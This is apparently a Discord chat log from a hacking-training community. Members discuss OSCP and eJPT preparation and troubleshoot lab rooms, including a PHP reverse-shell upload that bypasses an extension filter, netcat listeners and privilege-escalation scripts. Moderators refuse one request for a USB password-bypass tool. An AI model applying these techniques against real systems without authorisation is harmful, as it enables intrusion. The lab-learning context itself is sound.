as i said there is also reference to streams (stdin/out/err), so probably it is not that easy to replicate the same on windows, maybe later i will try to come back to this one 😄 thank for input anyway 😉

Took the teat for the first time, failed

I started last night, I was feeling confident, I went to sleep with 30 points. I got the buffer over flow out of the way.....

Then today I gained no ground

try and assess yourself, what were your weak areas? did anything caught you off guard? don't get disheartened, you've attempted it, you already have an advantage the next time you'll be doing it!

Weak areas include bad luck on box assignments.

hi

hiya

hello quys, I've got a question

any way to make a rubber ducky style usb t opent test and crack/bypass win 10 passwords?

Doesn't sound legal.

it dosent mather for educational purposes?

I aint try'na get into trouble

i just want to have a lil fun with it at home and with friends

and in my country legality of hacking is different than USA and most EU countries

but I repeat i do now plan to go hack stuff now

That's your choice, but you're not getting help in this Discord regarding your endeavors.

i thought this was the point of this discord?

or did I completely misunderstood the meaning

behind this discord server?

It's always useful to read the rules first, when joining a server.

I did, the problem was I joined this dicord server last year and kinda forgot about the rules and the meaning, I thought it was educational hacking in general

Yeet

I love how optimistic the time estimates are for the Offensive pentesting path

5 hours for the buffer overflow rooms

hi

Hy, i have a problem, Steel Mountain room, when i run the exploit, i get this error

Any solution?

Wrong LHOST

@flint current set LHOST to your THM ip

You can get your thm ip by the following command:
ifconfig tun0

just in case you run a default distribution of kali without changing the password it might be good to remove your IP address from discord @fervent harbor

no im not but its better to remove it anyways

Thanks @fervent harbor , @keen iris !

Hello, I am looking for assistance with uploading a php-reverse-shell to Vulnersity. Could anyone assist me? I will walk you through my current stage. I cannot get the nc listener to pick up the reverse shell to save my life!

What IP did you put in the file?

My tun0 THM IP

I've tried ports 443, 9001, 4444, 1234

nc -lvp and -lvnp

Ok and what hapoens when you navigate to your uploaded shell?

Mostly says failed to daemonize...but I tried a diff php shell and it was just a white screen with no text

Failed to daemonise is not an error just a warning

Show us the whole message

The text after 'Failed to daemonise' is what's useful

"WARNING: Failed to damonise. This is quite common and not fatal. Connection Timed out (110)"

What OS are you running?

Kali 2020.3

Ok I don't think you're using the right IP, or you have a firewall running in Kali.

IP is from 10.10.10.10 after I'm VPNd to THM

Firewall could be it, I didnt think of that

Are you using a VM?

Kali ships without a firewall.

Yes using VIrtualbox

Should I try eth0?

Ok, and is the VPN running on the VM or on the host?

VPN is running on VM once I log into Kali (Virtualbox)

Win10 host

Don't run it on the host at all.

Run it in a terminal in the VM.

That's what I do

Can you screenshot the reverse shell with the options and your listener? @dim verge

What port do you recommend for the listener?

Whatever port you put in the script

Ok, now out of curiosity, what are determining factors for ports you use for your shell/listener?

Outbound firewall rules, nothing else

Just make sure you listen on whatever port it's going to try to connect to

The port I add into my shell needs to be the same one I listen for on my netcat listener, right?

I apologize, I am fairly new

Yes

No apologies necessary

Can you show screenshots please?

Stand by

https://tenor.com/view/star-wars-the-mandalorian-stormtrooper-standing-by-stand-by-gif-15911372

@tulip badge I have to leave can you help this wandering soul

no can do

doing exam right now kkkk

The IP I enter is the same one from 10.10.10.10

I changed to .phtml because .php isn't allowed for uploads

And netcat just hangs....

What are the first 3 octets of the IP?

I wish to practice for the OSCP and i'm considering Tryhackme Offensive Path for starting out the evil stuff??

Any Suggestions on Tryhackme Offensive Path

start at the start & do 'em all

What evil stuff?

What evil stuff are you talking about?

What would that evil stuff be? 🙂

-mute @analog escarp 100y Please come and see us in the #talk-with-us-no-threading channel 🙂

🔇 Muted Lokesh#6135 for 100 years and 2 days

100 years and 2 days, those last two days would really drag

Who's passed the OSCP here?

... not yet, ask me in half a year 😆

😄 I'm just curious how difficult it really is. I study like 6 hrs a day but haven't committed to buying the course yet. Big investment

Really hoping to win the raffle. I think with the courseware I could do it.

hard to say. made a plan for 3 months to learn 2 hours a day. after that i will decide if i am ready for the 90 days pack...

I'd say good luck but if you pass the OSCP luck had nothing to do with it 😄

It does though

Box selection is RNG

RNG? Random Number Generator?

Yes

Boxes are randomly selected

So the five boxes you have to hack in the 24hr period are randomly selected? From how many potential boxes I wonder..

That's really good info. thanks

There is 1 certainty

There will be a win32 bof

hmm. I read the CEH practical does 25 boxes in 6hrs.. they must be drastically easier than OSCP boxes.

I also wonder why the OSCP isn't listed on the DOD 8570.. especially since it's widely agreed upon within the community that it's the most comprehensive.

Pentest+ is now

So kinda ideally replaces CEH for all intents and purposes

Hey i just started with SteelMountain and uploaded PowerUp.ps1 but when i try to run it there is no output

Wait nevermind you are supposed to run a second command after, didnt see that xD

lol there is such a channel? ahhaha

Yes. It's not a public channel.

funny lol

Not really.

Hey!!
I need help urgently. There is this problem I have been stuck with since last night. So I am trying to solve the ice room challange and this is the error I am getting when I try to gain access using metasploit.
Exploit Completed but no session was created.

make sure that you changed the right options

show us the options that you set (screenshot)

hey all, got a problem with the Vulniversity Task 4. When I go to send a the series of payloads against the upload site, I'm supposed to get errors back except for one extension right? well I'm getting successes back on everything I send via burp. When I try to manually upload, it errors out like it's supposed to but burp is fine. Here's the screenshot of the intercepted packet after I've edited it for the file extension replacement:

and here's my results:

can someone guide me to what I'm doing wrong?

@agile ibex disable payload encoding

I did try that before but I'll give it another shot...i just updated burp to the newest version too

No change...still getting 200's

Yes

Don't look at the status code

Look at the length

Uploading the wrong file type is not a HTTP error.

Uploading the wrong file type is an error from the webapp.

ohhhh i see it now

thank you @keen iris that makes sense now.

Can you just attack owasp juice shop without worrying about legality?

What parts of the site is one allowed to attack?

I'd use the juice shop VM on tryhackme

Then it's all over the VPN and all in scope.

You can get RCE on the box, so scope is a little iffy

I was thinking about this one :
https://tryhackme.com/room/rpburpsuite

But okay, I'll try that.

Thanks!

Yeah that uses the Juice Shop box

Or you can locally host juice shop or you can host it on your heroku account. all they ask is to not ddos or brute force their servers

Anyone using pwncat here

is this path useful to get OSCP?

Yup

Cool! I’ll crack on!

I'm having an issue on Kerberos Server. Can anyone look at what I have and the error I get and let me know what I'm doing wrong?

Nevermind.. I figured it out. 🙂

in the basic penetration testing room. completed the getting the room username 'jan' & 'kay' but while checking for some priv esc vector wit linPeas. it was scanning my own box rather than the tryhackme box
Idk wat i did wrong

in the basic penetration testing room. completed the getting the room username 'jan' & 'kay' but while checking for some priv esc vector wit linPeas. it was scanning my own box rather than the tryhackme box
Idk wat i did wrong
@analog forge you need to transfer and run the linpeas script to the box your tryna escalate your privileges on

@quick lily ok like running a local vulnerability analysis
thanks man

@fleet wedge i use pwncat time to time

Whats up?

is this a good place to ask for guidence?

I have a problem with Internal. Its not loading properly so I cant log in in wordpress

when I replace the url for the ip i can't log in:

its like is not loading correctly the webpage, I've tried opening a new box but with the same results

Add it to /etc/hosts

Oh thank you, now its working.

has anybody here passed eJPT recently?

Always best to just directly ask your question

I don't know if free resources on INE are enough for passing the exam, on the other hand 2000$ for course is 2much 4 me

OSCP offers full material with exam in price for 1500$

That's the training material

And the ejpt material is available for free

That's the material.

THE material.

thats true

🤔

thanks james u always answer my thoughts and questions

I have passed eJPT recently, like 2 weeks ago.

The material available for free with the starter pass is the same as if you are an INE subscriber. I am an INE subscriber as I am now doing PTP. In my opinion, I'm not sure the cyber security pass is worth the money. In approximately of the labs I have done on PTP the solutions are unworkable on current versions of Kali linux without downloading old and now deprecated versions of tools and some significant time spent troubleshooting. I appreciate that troubleshooting problems with tools and labs is probably good experience for the future, but right now I want to concentrate on learning the hacking techniques and the problems I have experienced with the labs are a real hinderance to this. Furthermore, I have found the customer service to be very patchy, if you have a problem with billing or the website (a non-technical problem) the customer service is great a <24 hour response to emails. However, the times I have emailed with problems about the labs (technical problems), usually problems with the tools/exploits prescribed, I have not received any response.

Enjoy your eJPT role 🙂

I'm not sure eJPT is going to get me a job 😂

Role as in Discord role, eJPT is a great first step

Oh, haha thanks!!

Magna I recently, read something you posted on Twitter or maybe a blog about your experience doing the OSCP, but noticed that you didn't do PTP, how did you find it going from eJPT straight to OSCP?

I was doing OSCP prior to eJPT but had to stop due to time commitments. I did eJPT in a week off from work. Tbf if u are able to do eJPT the learning materials OSCP provide wont be too alien to you. If u practice ur Buffer Overflows on THM and do the "OSCP like boxes" list prior to starting the labs thats a bonus. Then pwn as much in the labs as possible, then u have a good chance.

Thank you so much for this comprehensive description. It helped me a lot! And good luck on your OSCP journey.

Thanks for the advice I appreciate it, my current path has been/is Net+ > Sec+ > eJPT > eCPPT (where I am currently at now) > OSCP, and as much as I know all these foundation courses are good for my understanding and will help me attain the OSCP, the time commitment is significant and I am trying to transition into a new career as quickly as possible and the OSCP is required for nearly all the roles I'm looking at, so I really just want the OSCP.

Can anyone tell if I am interested in Ethical Hacking, should I go for RHCSA ??

Hi all, I am doing the OSCP and one thing that I really struggle with is bof. I have nearly completed the Buffer Overflow Prep room, and I am wondering if anybody can recommend any other rooms to gain more more experience both in Windows and Linux. Many thanks 🙂

Bear in mind the OSCP bof is always going to be a win32 bof

Oh ok thanks, the PWK has Linux as well. I thought that this might be in the exam also

me :)

no? why that cert out of all the others designed for security

guys say I subscribed to one of your learning pathways, do you give certificates of completation (sry for my bad grammar)

hope you respond fast because I am willing to pay

but I just want to know if you give certificates or not (if so , Can i work with this certificate)

Pathways don’t award certificates

But Throwback and AoC2 does

explain more

pls

You can get some badges from the pathways

yea

Throwback is an AD lab which once you complete it you get given a certificate however it’s separate pay and AoC2 was the event that ended but still awards the certificate

Although soon there will be a subscriber lab not sure if it will award anything tho

where can i find this throwback lab?

https://tryhackme.com/network/throwback

Dammit Blackout!

Too fast for you Esqy :p

I think there a doc for it

!docs

!help

I stand corrected

can i work with this Ad lab certificate

It's not accredited

Aye. Its a certificate of participation.

and completion

But you can still put it on you cv and say what you learned that's what others have done

ah ok another question if you may

Sure

say i ended the offensive security pathaway

Yea

what will i benefit from it afterwards

You will have gained a significant amount of knowledge. That will make related Certs a lot easier

You'll understand how to learn the standard tools, learn about realistic attacks learn about pen testing red teaming networking web pentesting etc

Can also help prepare for certs like OSCP

and how can i get this OSCP certificate?

hhhhh

iam trully sry

ik iam disturbing u

but iam actually a newbie

and i just want to know

and learn

You can get OSCP from offsec which costs like $1000 IIRC

It's an entry level cert

If you are completely new, I'd suggest working through THM rooms and activities. OSCP - Although touted as 'foundation', you do need to know your stuff before getting it. There are other certs that have different requirements. eJPT is respected in the industry for example

However you're going to have to get a lot of knowledge and how to pwn machines

oh i am actually aiming to get the Ceh certificate

is it good?

I honestly wouldn't reccomend it

If you're asking about careers ask in #cyber-and-careers

well iam not that new i actually know a bit of linux and hacking

Thats good - So build on those skillz.

CEH doesn't have the best reputation, although I do know that some countries like it (I think some Indian companies require it for certain roles for example)

yea i am reading books now , is it good?

k thanks for the info!

We are always willing to help people who are here to learn.

Yes reading books is good depending on which ones you are reading

name of the book : Pentesting a-hands-on introduction

it teaches me several things

such as exploitaion

and vulnerbilities

in the systen

Yea that's a good book to read

and lots of attacks such as cracking passwords and it teaches me mobile hacking

That's good is there anything else you want to know?

thx a lot m8 for the info ! and sry for being stupid xD

No you're not stupid it's good to ask questions so you know how to learn

Its a good start! From my POV, nothing beats practical experience, like THM rooms. And I'm not just saying that 😄

Guys is it necessary to learn programming if i want to be a pentester?

(btw i know the basics of python)

it is not required, but it is a good skill to have

so having the basics down is enough?

the basics is always a good start, but you will want to eventually have some deeper knowledge in many of the tools

Understanding generally how scripting and coding works is good. Being able to look at something and understand the difference between functions, variables, etc, and a general ability to understand programmatic logic is important. But by no means do you need to be a programmer.

hello all

@clear geyser, hello.

can you dm me the amazon link?

Hi, im new here 🙂

Hey

Anyone have a issue with Kenobi when using smbget? Says it’s not a recognized commmand along with cat. I got the info in the log.txt file by using “more” and used a screenshot to capture the info.

just get?

That worked 😂😂😂

So funny the simpler basic idea prevails!!!

Thanks @keen iris

https://www.amazon.com/Penetration-Testing-Hands-Introduction-Hacking-ebook/dp/B00KME7GN8

Hey 👋 I am having an issue with the Buffer Overflow Prep. It seems like I am unable to connect when I run the fuzzer.py script. I can connect via netcat fine though.

Ughhh. I'm dumb. Nevermind!

hey guys im on the last box of the advanced exploit portion of the oscp path but havent started it yet, ive used a lot of write-up help/hints from people in discord on the previous rooms - should i even start learning about the bofs yet?

i think so. the 4 rooms in the buffer overflow exploitation section of the path you're doing are all great for oscp prep (if that's what you're doing). even if you aren't doing the path to prepare for an exam it's still fun to learn 🙂

i definitely wanna learn it to prep for the oscp but i guess like starting to learn that when im not even that good at stuff covered in advanced exploitation would be overwhelming lol

Understood. I’m not sure where you are technically but I think getting a solid base is important before branching out into a more obscure thing like binex. Mastering the ‘basics’ will pay off big time as you start to encounter the more ‘advanced’ exploits. If you want to pm me I can give you some things that helped me

I’m a big fan of Elon Musks style of learning. Worth checking out even if you aren’t planning on changing up how you’re studying/researching/etc

Gotta be hard to stay that motivated to read that much 🙂

Hi

@buoyant zinc I'm on that room too but I can't get nmap to scan the box. It keeps saying the machine is down and not responding. I've redeployed the machine a few times and it's the same result. How'd you get past the no response issue or did you not run into that?

@agile ibex What room?

Kenobi

Check your VPN.

checking...VPN says connected. I'll disconnect and reconnect real quick.

Ignore the access page

It's not reliable

Check with http://10.10.10.10/ which runs a webserver and responds to pings

quad 10 was giving me an ip so i thought it was good. Just reset the VPN and now it's scanning lol. thanks @keen iris

There's also the vpn script

!vpnscript

cool! Thanks!

Sorry for the late response. I had issues too but, I just regenerated a new VPN cert/keys and I was good.

@frank trout where were you last night when the Kenobi box kept timing out? 😂😂 Just kidding. Though I still got it done before I fixed the VPN issue.

That's... that's the bot

What? I can’t talk to bots? 🤖 what kind of discord is this?

Bad enough that bartender in Star Wars wouldn’t serve them.

@keen iris I always yell at the Discord bots. Skynet will not have their day on my watch.

We have robocop too

Awesome! Glad to see you guys have the technology

We can rebuild him

You should lease him to Detroit. They can use him now.

I’ll stop now and go back to my Mario Lopez Lifetime Col Sanders movie.

This is getting off topic but I need to watch that

It’s..... I dont know what. 🤣

can someone tell me more about this path?

is it worth it?

Seeing as you don't pay just for the path, is it worth what?

You pay for a subscription that gets you a lot more than just access to the learning paths

Yes !

I want to get VIP for accessing everything

Just the extra resources on VMs and the extra content would be worth it to me

oh i understand now

Disclaimer: I get my subscription for free from the admins

thanks for the help!

hahah

okay

Counter disclaimer: I got my housemates subscriptions for Christmas

but is the labs stable or under pressure, because free subscription never worked out for me

it was very slow 😦

What was very slow?

You don't share any VMs on TryHackMe

the connections and for example scanning and exploiting

even navigating through pages on websites

That'll depend where you are in the world

I was Playing KOTH

And your broadband

You do get access to some subscriber exclusive VPN servers, but the room VMs are still hosted in the EU in Ireland.

Most VMs will deploy with more resources though.

im 135ms away from them but other platforms works well for me with 135ms even, when it comes to gaming i play at 135 , some hiccups but it's optimal for me

im in dubai

I have a Fiber connection with Great speeds, i guess it's just like you said

but does VIP subscription give me a more stable connection despite the ping?

I have a perfectly stable connection and I'm on a free VPN server

So I can't answer that

Almost finished up with the offensive path.... i really dislike powershell lol was a major headache going thru those tasks. It makes very little sense to me. Anyone else feel the same?

@tawdry vessel I would say the enumeration part was a little long cus of googling but I learned so many new commands and little tricks with powershell whether its a one liner or a script

Finally completed. Now on to Pentest+ 🙂

ive already completed all but 2 of the rooms in the pentest+ learning path lol oh well

Hi All. qq - is the offensive-pentesting-path the new name for the oscp path? I'm preparing for the OSCP, and while I found a number of online reviews for tryhackme's OSCP path, I don't see a path of that name when I sign in.

The name OSCP is copyrighted, so the learning path is changed to Offensive Pentesting.

got it - thanks!

Hi, Can someone tell me on the offline Blue Machine, it asks for password , should I break the password ? or should work without loggin in to it ? or the pasword is somewhere ? at the hint it says It ain't giving anything,

@hoary garden ...offline blue machine?

You downloaded the OVA from dark's website?

yes

Follow the instructions in the room

in the blue room are for the one deployed, not for the offline one

It's the same box.

Follow the instructions. It's the same box. That's the whole point of having it downloadable.

yeah, doesnt look like that

in the instructions is about the deployed one not the offline one and the offline one has a password

Im breaking the passwords now

I deleted the passwords, not sure that was the plan or not,

the offline one works better,

You're not meant to log in to it!

You're meant to attack it over the network

It's literally the same box

could have worked without logging in to iet?

Don't ask for help and then argue when you actually get it, it's horrifically rude.

Yes.

I asked, you told me to read the instructions, I think if you didn't want to help just don't reply

I did help

I know I have to read the istructions

is like telling me " google"

You just decided to argue every single time

And claim it wasn't the same box

When it is.

what's the point of the discord if i have to gogole?

And then not follow the instructions in the room.

or read the instructions ?

is the same box

i assume

What's the point in the discord if you have to read the instructions?

I never said is not the same

i just asked what should i do

yo told me to read the instyructions

oooo thank you very much

very helpful

yes

it doesnt sa anything in the video about the offline one

Plus there is a lot more to pentesting than the OSCP. It's a good prep path for eCPPT and other certifications as well.

What would suggest to go after first? eJPT, Pentest+, OSCP, etc?

I mean look at the course of eJPT on ine. If u feel comfortable knowing all the pre-requisites and can do those 3 black box pen test, than u should do the OSCP

Either way the 3 black box pen test on eJPT are really good and helpful

depends on your path you want to go. If you want to jump into a job and go government I would say pentest+ because it just got DoD recognition. If you just want a friendly practical course to learn and progress your learning go for eJPT. If you want to challenge yourself and have more job offers / opportunities go for OSCP

@wet sierra when people say government and DOD, does that apply to cia or nsa. I wouldnt think its mandatory to have a DOD cert for a position in one of those high gov positions. I dont know but just wondering

They’re government why would they not be the same

but yes they both still require DoD 8570

Thats kinda sukishh to put it nicely, like they would see a Pentest + cert over an OSCP

Than again private and public sector is different

Because OSCP is a low key trash heap

I much prefer them having pentest+ rather than OSCP makes barrier of entry easier for newer people and more affordable

Good point. I was just always curious as to why they regard the comptia certs a DOD certified and all

But what u said makes sense now

Non vendor specific mainly, also comptia is just very well regarded and recognized

They’re known for being straight to the point and no fuss

where as OSCP can be a luck of the draw exam

To the point is correct. U have 5 or 6 domains, the material u learn is very helpful. I do wanna aim for that so im prob down the line gonna need to get like a security +

Think i finished 2 of the 3 black boxes on ine.. ive been able to do a lot of the "easy" boxes on oscp's proving grounds... but there are a few areas i need to work on, which is why ive not pursued any certs yet

Im thinking of the security+ as well just to help get things rolling in terms of finding a job and all

I mean ur doing well i see, if anything dont push the button for taking certs yet. U know when ur comfortable enough to actually pursue a cert

Yea it all boils down to that specfic job role or roles u want

I just really enjoy learning the pentesting stuff..at least what is offered on tryhackme and such